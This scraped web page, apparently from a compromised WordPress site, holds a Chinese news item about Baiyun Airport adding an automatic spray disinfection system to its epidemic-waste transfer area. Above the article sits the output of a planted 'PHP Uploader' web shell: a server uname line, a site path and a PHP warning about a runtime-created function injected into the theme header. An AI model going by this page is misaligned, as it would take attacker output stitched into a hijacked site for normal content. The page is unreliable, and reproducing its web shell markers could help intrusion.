PHP Uploader - By Phenix-TN & Mr.Anderson
Linux iZwz91hdhujjzqy9icuvwuZ 5.4.0-31-generic #35-Ubuntu SMP Thu May 7 20:20:34 UTC 2020 x86_64
okokok/www/wwwroot/aircn/new_wordpress/wordpressokokok
Warning: Use of undefined constant itongtong - assumed 'itongtong' (this will throw an Error in a future version of PHP) in /www/wwwroot/aircn/new_wordpress/wordpress/wp-content/themes/newsbulk/header.php(29) : runtime-created function on line 1

46.jpg

近日,白云机场在污水处理厂涉疫垃圾转运区域及脱消间新增自动喷淋消杀系统。该系统可对区域内涉疫车辆、脱消间环境及设施进行全方位、全自动智能化喷淋消毒,实现无缝消杀防疫。

白云机场是新冠肺炎疫情“外防输入”的重要关口,每天有大量的涉疫垃圾都是通过污水处理厂进行转运处置,期间有不少工作人员在污水处理厂涉疫垃圾转运区及脱消间作业。为此,白云机场一方面加大了对防疫的投入,另一方面强化防疫规范化管理,研究制定了科学严格的管理制度、作业指引和消杀规程,严抓培训教育和监督执行。根据形势变化和防疫的需要,白云机场对消毒方式进行了改进和优化,经过认真调研,组织人员进行攻关,在污水处理厂涉疫垃圾转运区及脱消间新增自动喷淋消杀系统。

47.jpg

该系统采用高压喷雾技术,可将消毒液形成雾化直径小于100微米的“雾墙”,具有工艺简单、使用方便,渗透力强、对人体无害等优点。通过精确计算安装及远程操控,可对涉疫垃圾转运区、板房及脱消间内外进行全覆盖、无缝隙消毒,大大提升了消杀效率,降低了人员感染风险。

来源:白云机场发布

作者 一潼

发表回复